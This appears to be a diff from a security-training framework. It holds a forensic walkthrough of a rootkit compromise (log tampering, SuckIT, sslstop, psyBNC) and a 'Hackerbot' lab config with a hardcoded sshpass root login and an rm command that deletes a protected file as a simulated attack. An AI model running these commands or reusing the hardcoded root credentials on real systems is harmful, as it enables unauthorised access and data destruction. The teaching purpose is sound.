At 23:30:54 /root/.bash\_history and /var/log/messages were symlinked to /dev/null.
Next more header files were accessed, this time Linux kernel headers, presumably to compile a kernel module (or perhaps some code that tries to tamper with the kernel). This was followed by the creation of the SuckIT rootkit files, which we previously investigated.
Note that a number of these files are created are again owned by the "apache" user.
What does this tell you about the likely source of the compromise?
Further down, note the creation of the /root/sslstop.tar.gz file which was extracted (files created), then compiled and run. Shortly after, the Apache config file (/etc/httpd/conf/httpd.conf) was modified.
Why would an attacker, after compromising a system, want to stop SSL support in Apache?
Meanwhile the attacker has accidently created a /.bash\_history, which has not been deleted.
Further down we see wget accessed and used to download the /etc/opt/psyBNC2.3.1.tar.gz file, which we investigated earlier.
This file was then extracted, and the program compiled. This involved accessing many header (.h) files. Finally, the "/etc/opt/psybnc/psybnc.conf" file is modified, presumably by the attacker, in order to configure the behaviour of the program.
---

View File

@@ -0,0 +1,83 @@
<?xml version="1.0"?>
<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<name>Bob</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<!--<get_shell>bash</get_shell>-->
<get_shell>sshpass -p randompassword ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<greeting>Hi there. Just to introduce myself, I also work here.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along</say_ready>
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<say_ready>Better hurry, the attack is imminent... Let me know when you're 'ready'.</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next attack...</next>
<next>Ok, next attack...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, previous attack...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skiping it along.</goto>
<goto>Let me see what I can do to goto that attack.</goto>
<last_attack>That was the last attack for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last attack. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Ok. Gaining shell access, and running post command...</getting_shell>
<getting_shell>Hacking in progress...</getting_shell>
<getting_shell>Attack underway...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>We are in to your system.</got_shell>
<got_shell>You are pwned.</got_shell>
<got_shell>We have shell.</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Don't ask me. I just work here.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<attack>
<prompt>An attempt to delete /home/dropbear/trade_secrets/credit_card is coming. Stop the attack using access controls.</prompt>
<post_command>rm --interactive=never /home/dropbear/trade_secrets/credit_card; echo $?</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted</output_matches>
<message>:) Well done!</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_equals>0</output_equals>
<message>:( We managed to delete your file! You need to use access controls to protect the file.</message>
</condition>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( The file should exist!</message>
</condition>
<else_condition>
<message>:( Something was not right...</message>
</else_condition>
</attack>
</hackerbot>

View File

@@ -0,0 +1,39 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_string_generator.rb'
require 'erb'
require 'fileutils'
class HackerbotConfigGenerator < StringGenerator
attr_accessor :accounts
attr_accessor :flags
attr_accessor :root_password
LOCAL_DIR = File.expand_path('../../',__FILE__)
FILE_PATH = "#{LOCAL_DIR}/files/example_bot.xml"
def initialize
super
self.module_name = 'Hackerbot Config Generator'
self.accounts = []
self.flags = []
self.root_password = ''
end
def get_options_array
super + [['--root_password', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--root_password'
self.root_password << arg;
end
end
def generate
self.outputs << File.read(FILE_PATH)
end
end
HackerbotConfigGenerator.new.run

View File

@@ -0,0 +1,22 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for an example bot</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a basic example config for hackerbot.</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>root_password</read_fact>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>

Some files were not shown because too many files have changed in this diff Show More